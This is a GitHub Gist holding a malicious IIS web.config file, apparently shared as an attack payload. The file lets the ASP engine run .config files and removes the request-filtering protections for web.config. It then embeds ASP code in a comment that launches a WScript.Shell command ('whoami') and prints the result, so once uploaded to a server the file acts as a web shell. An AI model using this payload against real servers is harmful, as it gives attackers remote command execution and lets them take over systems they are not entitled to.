Last active
March 11, 2023 13:49
-
-
Save 003random/e646a2c3ef47f560f17e1dee0443f685 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<configuration> | |
<system.webServer> | |
<handlers accessPolicy="Read, Script, Write"> | |
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
</handlers> | |
<security> | |
<requestFiltering> | |
<fileExtensions> | |
<remove fileExtension=".config" /> | |
</fileExtensions> | |
<hiddenSegments> | |
<remove segment="web.config" /> | |
</hiddenSegments> | |
</requestFiltering> | |
</security> | |
</system.webServer> | |
<appSettings> | |
</appSettings> | |
</configuration> | |
<!–- | |
<% Response.write("-"&"->") | |
Response.write("<pre>") | |
Set wShell1 = CreateObject("WScript.Shell") | |
Set cmd1 = wShell1.Exec("whoami") | |
output1 = cmd1.StdOut.Readall() | |
set cmd1 = nothing: Set wShell1 = nothing | |
Response.write(output1) | |
Response.write("</pre><!-"&"-") %> | |
-–> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment